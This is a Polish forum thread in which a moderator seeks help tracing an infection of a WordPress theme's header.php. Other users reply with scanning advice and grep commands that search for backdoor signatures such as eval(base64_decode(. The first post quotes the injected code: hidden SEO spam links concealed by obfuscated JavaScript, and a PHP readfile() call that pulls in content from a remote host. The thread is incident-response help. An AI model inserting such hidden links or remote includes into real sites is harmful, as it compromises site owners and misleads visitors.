 Wirus in Wordpress |
  |
| Wirus in Wordpress |
Post
#1
|
|
|
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004  |
Hejka, dostalem do analizy strone postawioną na WP, w ktorej w header w theme porto w header.php pojawilo sie takie cos:
Kod <div id="zcs"> <a href="http://www.usercc.com">釣漁具</a> <a href="http://www.usercc.com">釣り道具</a> <a href="http://www.usercc.com">山口屋釣漁具||釣り道具(釣り具)</a> <a href="http://www.kku4h.com/">釣り用品</a> <a href="http://www.kku4h.com/">フィッシング用品</a> <a href="http://www.kku4h.com/">釣り用品: フィッシング用品の通販</a> <a href="http://www.ecotoid.com">大阪漁具</a> <a href="http://www.ecotoid.com">鮎釣り 道具</a> <a href="http://www.ecotoid.com">大阪漁具、鮎釣り 道具、タモ網</a> <a href="http://www.tasmr.com/">中央漁具</a> <a href="http://www.tasmr.com/">大阪 釣具</a> <a href="http://www.tasmr.com/">アメリカ屋漁具?中央漁具 - 漁具!大阪 釣具</a> <a href="http://www.usercc.com">http://www.usercc.com</a> <a href="http://www.kku4h.com/">http://www.kku4h.com/</a> <a href="http://www.ecotoid.com">http://www.ecotoid.com</a> <a href="http://www.tasmr.com/">http://www.tasmr.com/</a> <a href="http://www.vapurtrail.com/">釣り道具</a> <a href="http://www.vapurtrail.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">磯釣り道具</a> <a href="http://www.vapurtrail.com/">釣り道具、釣り用品必要なのかを分かりやすく紹介しています</a> <a href="http://www.ghmuk.com/">釣竿 メーカー</a> <a href="http://www.ghmuk.com/">鮎釣り用品</a> <a href="http://www.ghmuk.com/">渓流釣り用品</a> <a href="http://www.ghmuk.com/">釣竿 メーカー、渓流釣り 鮎竿、釣り道具を探すなら岡野釣具店</a> <a href="http://www.danceani.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">http://www.vapurtrail.com/</a> <a href="http://www.ghmuk.com/">http://www.ghmuk.com/</a> <script>document.getElementById('z'+'c'+'s').style.display='no'+'ne'</script></div> <?php readfile('http://remote2.iduun.net/link/dvd.txt'); ?> No i teraz próbuje dojść ktoredy to wlazło... Ftp i ssh zostały wykluczone przez admina, nie było żadnych takich połączen w wybranym czasie, wiec jakaś dziura w WP? Nie mogę za bardzo nic wygooglać. Wiem, że wp jest dziurawy jak ser szwajcarski.... Jedyna rada to być na bieżąco z aktualizacjami czy cos jeszcze? |
 |
 
|
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%) 
|
http://wpscan.org/ + sprawdź ręcznie czy nie używasz starych wersji pluginów ze znanymi błędami.
Cytat Ftp i ssh zostały wykluczone przez admina Nie traktowałbym tego jako wyrocznię.Przeskanuj też czy nie masz gdzieś jakiegoś backdoora (dodatkowy plik / zmodyfikowany plik wp). Ten post edytował redeemer 4.05.2015, 14:14:35 |
|
|
|
|
Post
#3
|
|
|
Grupa: Zarejestrowani Postów: 616 Pomógł: 84 Dołączył: 29.11.2006 Skąd: bełchatów Ostrzeżenie: (0%)
|
https://wordpress.org/plugins/bulletproof-security/ lub inne pluginy typu Security
Ten post edytował memory 4.05.2015, 14:16:28 |
|
|
|
|
Post
#4
|
|
|
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)
|
|
|
|
|
|
Post
#5
|
|
|
Grupa: Zarejestrowani Postów: 616 Pomógł: 84 Dołączył: 29.11.2006 Skąd: bełchatów Ostrzeżenie: (0%)
|
heehehe, pewnie zdążyli załatać (IMG:style_emoticons/default/smile.gif)
Ten post edytował memory 4.05.2015, 14:19:44 |
|
|
|
|
Post
#6
|
|
|
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)
|
Cytat(memory @ 4.05.2015, 15:17:41 )  heehehe, pewnie zdążyli załatać (IMG:style_emoticons/default/smile.gif) To było "responsible disclosure", więc łata była od razu albo i wcześniej. Jednak IMHO nie wygląda to dobrze :-)
|
|
|
|
|
Post
#7
|
|
|
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004 |
No ok, przelecialem tym wpscanem, faktycznie troche starowaty ten wp....
Cytat Przeskanuj też czy nie masz gdzieś jakiegoś backdoora Ale czym mam przeskanowac?
|
|
|
|
|
Post
#8
|
|
|
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)
|
"Starowaty"? To upgrade - nad czym się tutaj zastanawiać? :-)
Co do backoodorów, to są jakieś automatyczne skanery, ale najprościej jak porównasz pliki na serwerze z czystym wp (+ pluginami które masz). |
|
|
|
|
Post
#9
|
|
|
Grupa: Zarejestrowani Postów: 1 045 Pomógł: 141 Dołączył: 19.09.2006 Skąd: B-tów Ostrzeżenie: (0%)
|
spróbuj czegoś takiego
Kod echo "error 0:" find . -type f -exec grep -q "@error_reporting(0)" '{}' \; -print echo "error 5:" find . -type f -exec grep -q "error_reporting(5)" '{}' \; -print echo "eval" find . -type f -exec grep -q "eval(base64_decode(" '{}' \; -print generalnie szukasz dziwnych fragmentów kodu zapisanych w base64 i wywołań przez eval ktoś musiał wgrać "panel administracyjny" przez jakiś dziurawy plugin lub przez ftp, a teraz ma pełen dostęp do serwera warto by również wyszukać i przeanalizować wszystkie pliki php które były edytowane przez np. ostatnie 30 dni |
|
|
|
|
Post
#10
|
|
|
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004 |
@sazian pliki się zmienily raczej tylko header.php we wszystkich themes jakie były.
Zastanawia mnie jednak fakt, ze razem z tą samą datą, co pliki header.php zostal rowniez zmieniony katalog PLUGINS, jednak w nim, nie widac zadnych plikow ze zmianą. Wygląda to wiec tak, jakby ktoś nagrał tam jakiś plik, poczym skasował. Miedzy nagraniem a skasowaniem mogl rzecz jasna jeszcze ten plik wykonac. Idzie jakos na serwerze znaleźć, czy odbyły się takie operacje: Nagranie po czym skasowanie pliku? |
|
|
|
|
Post
#11
|
|
|
Grupa: Zarejestrowani Postów: 1 045 Pomógł: 141 Dołączył: 19.09.2006 Skąd: B-tów Ostrzeżenie: (0%)
|
równie dobrze ktoś mógł zmienić datę edycji pliku,
przez "panel administracyjny" masz pełen dostęp do shella |
|
|
|
|
Post
#12
|
|
|
Grupa: Zarejestrowani Postów: 324 Pomógł: 105 Dołączył: 7.08.2012 Ostrzeżenie: (0%)
|
Może takie coś? http://www.forum.optymalizacja.com/topic/2...-ftp-od-yandex/
Warto przeczytać też posty innych użytkowników w tym temacie. |
|
|
|
|
|
Aktualny czas: 16.09.2025 - 09:05 |
